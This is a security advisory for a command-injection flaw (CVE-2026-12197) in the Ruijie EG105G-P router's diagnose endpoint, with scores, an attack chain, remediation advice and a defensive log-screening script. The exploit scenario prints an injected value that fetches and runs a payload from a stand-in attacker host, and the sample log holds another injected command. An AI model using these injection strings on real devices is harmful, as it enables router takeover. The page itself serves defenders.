Ruijie EG105G-P CVE-2026-12197

EUVD-2026-36673 · HIGH
Command Injection (CWE-77)
2026-06-14 · VulDB · GHSA-f7mp-cw7j-wx85
CVSS 4.0 score: 7.3 (Vendor: VulDB)

Severity by source

Vendor (VulDB), primary: 7.3 HIGH
CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI: 7.2 HIGH

Network-reachable management endpoint (AV:N), straightforward injection (AC:L), but requires admin login to call the diagnose API (PR:H); successful injection yields full OS-level control of the device (C/I/A:H).

CVSS 3.1: AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
CVSS 4.0: AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Primary rating from Vendor (VulDB).

CVSS Vector (Vendor: VulDB)

Attack Vector: Network
Attack Complexity: Low
Privileges Required: High
User Interaction: None
Scope: X

Lifecycle Timeline

Jun 15, 2026 - 00:26 (vuln.today): Analysis generated
Jun 15, 2026 - 00:22 (NVD): CVSS changed, 8.6 (HIGH) → 7.3 (HIGH)

Description (CVE.org)

A security flaw has been discovered in Ruijie EG105G-P 2.340. The impacted element is the function nslookup of the file /cgi-bin/luci/api/diagnose of the component JSON-RPC Diagnose Endpoint. Performing a manipulation of the argument params.target results in command injection. It is possible to initiate the attack remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.

Analysis (AI)

Command injection in the Ruijie EG105G-P 2.340 gateway router allows authenticated remote attackers to execute arbitrary OS commands by manipulating the params.target argument of the nslookup function in the /cgi-bin/luci/api/diagnose JSON-RPC endpoint. Publicly available exploit code exists, the vendor did not respond to coordinated disclosure, and successful exploitation yields full confidentiality, integrity, and availability impact on the device.

Attack Chain (AI-derived)

Hypothetical attack flow derived from CVE metadata

Access: Discover exposed EG105G-P management UI
Delivery: Obtain admin credentials (default/reuse/phish)
Exploit: POST crafted JSON-RPC to /cgi-bin/luci/api/diagnose
Execution: Inject shell metacharacters in params.target
Persist: Execute arbitrary commands on device
Impact: Install backdoor or pivot into LAN

Vulnerability Assessment (AI)

Exploitation: Exploitation requires (1) network reachability to the device's HTTP management interface, specifically the /cgi-bin/luci/api/diagnose JSON-RPC endpoint, and (2) authenticated administrative access to invoke the nslookup diagnostic function (CVSS PR:H). …

Risk Assessment: The CVSS 4.0 vector (AV:N/AC:L/AT:N/PR:H/UI:N) with VC:H/VI:H/VA:H produces a 7.3 base score, reflecting full device compromise but tempered by the PR:H requirement - exploitation needs high-privileged access to the management interface, which substantially narrows the threat to attackers who already hold administrative credentials (default, weak, reused, or phished) or who can reach the panel post-authentication via another flaw. …

Exploit Scenario: An attacker who has obtained admin credentials for an internet-exposed EG105G-P (via password reuse, phishing, brute force, or chained access) sends a crafted JSON-RPC POST to /cgi-bin/luci/api/diagnose invoking nslookup with a params.target value such as '8.8.8.8; wget http://attacker/x -O /tmp/x; sh /tmp/x', causing the device to fetch and execute a payload. Because publicly available exploit code exists, this can be scripted at scale against Ruijie devices discovered via Shodan/ZoomEye, leading to router takeover, traffic interception, or pivoting into the LAN.

Remediation: No vendor-released patch identified at time of analysis - Ruijie did not respond to VulDB's coordinated disclosure, so defenders should treat the issue as unfixed. …
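
With no patch available, one compensating control is to screen nslookup calls to the diagnose endpoint at a reverse proxy or during log review, accepting only a literal IP address or a valid hostname in params.target. The following is an added example, not code from the advisory or from Ruijie; the JSON body layout and the (path, body) record format are assumptions.

```python
import ipaddress
import json
import re

# Path, method and argument names are from the advisory; the JSON body
# layout {"method": ..., "params": {"target": ...}} is an assumption.
DIAGNOSE_PATH = "/cgi-bin/luci/api/diagnose"
_CHARSET = re.compile(r"[A-Za-z0-9.:-]{1,253}")  # also rejects IPv6 zone ids ("%")
_LABEL = r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)"        # no leading "-": no option injection
_HOSTNAME = re.compile(rf"{_LABEL}(?:\.{_LABEL})*\.?")

def is_safe_target(value):
    """True only for a literal IP address or a syntactically valid hostname."""
    if not isinstance(value, str) or not _CHARSET.fullmatch(value):
        return False
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return _HOSTNAME.fullmatch(value) is not None

def flag_requests(records):
    """Return (index, reason) for each logged diagnose request that needs review."""
    findings = []
    for i, (path, body) in enumerate(records):
        if path.split("?", 1)[0] != DIAGNOSE_PATH:
            continue
        try:
            call = json.loads(body)
            method = call.get("method")
            target = call.get("params", {}).get("target")
        except (ValueError, AttributeError):
            findings.append((i, "unparseable body"))
            continue
        if method == "nslookup" and not is_safe_target(target):
            findings.append((i, "target is not a hostname or IP"))
    return findings

# Constructed sample log entries (not captured traffic).
SAMPLE = [
    (DIAGNOSE_PATH, '{"method": "nslookup", "params": {"target": "example.com"}}'),
    (DIAGNOSE_PATH, '{"method": "nslookup", "params": {"target": "192.0.2.10; id"}}'),
    (DIAGNOSE_PATH, '{"method": "nslookup", "params": {"target": "-debug"}}'),
    ("/index.html", ""),
    (DIAGNOSE_PATH, '["not", "an", "object"]'),
]

if __name__ == "__main__":
    for idx, reason in flag_requests(SAMPLE):
        print(idx, reason)
```

The check is an allowlist rather than a metacharacter blocklist, so it also rejects newlines, leading hyphens and IPv6 zone identifiers that a blocklist could miss.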

Recommended Action (AI)

Within 24 hours: Audit all Ruijie EG105G-P 2.340 gateways in production and restrict administrative interface access (/cgi-bin/luci endpoints) to trusted networks only; disable remote management if not required. …
